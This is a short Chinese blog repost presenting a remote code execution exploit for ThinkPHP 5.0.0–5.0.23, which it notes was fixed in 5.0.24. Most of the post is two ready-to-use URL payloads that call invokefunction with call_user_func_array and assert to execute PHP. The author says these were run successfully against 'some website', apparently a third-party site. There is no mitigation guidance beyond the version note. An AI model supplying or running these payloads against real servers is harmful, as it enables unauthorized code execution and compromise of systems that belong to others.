ThinkPHP 5.0.0-5.0.23 远程代码执行漏洞利用

傷城~ 2021-11-02 02:08 488阅读 0赞

漏洞影响范围: 5.0.0-5.0.23

官方已在5.0.24版本修复该漏洞。
测试Payload:

  1. /public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo()
  2. /index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo()

以某个网站为例,可以看到成功执行phpinfo()函数。

1288723-20190720195527796-1043379276.png

1288723-20190720195542221-761611851.png

转载于:https://www.cnblogs.com/dgjnszf/p/11219030.html

发表评论

表情:
评论列表 (有 0 条评论,488人围观)

还没有评论,来说两句吧...

相关阅读

    相关 远程代码执行漏洞

    远程代码执行漏洞是指在计算机系统上,攻击者可以通过网络连接远程执行指定的代码,甚至可以执行操作系统命令。这种漏洞通常存在于应用程序或服务器软件中,攻击者可以利用这种漏洞获取控制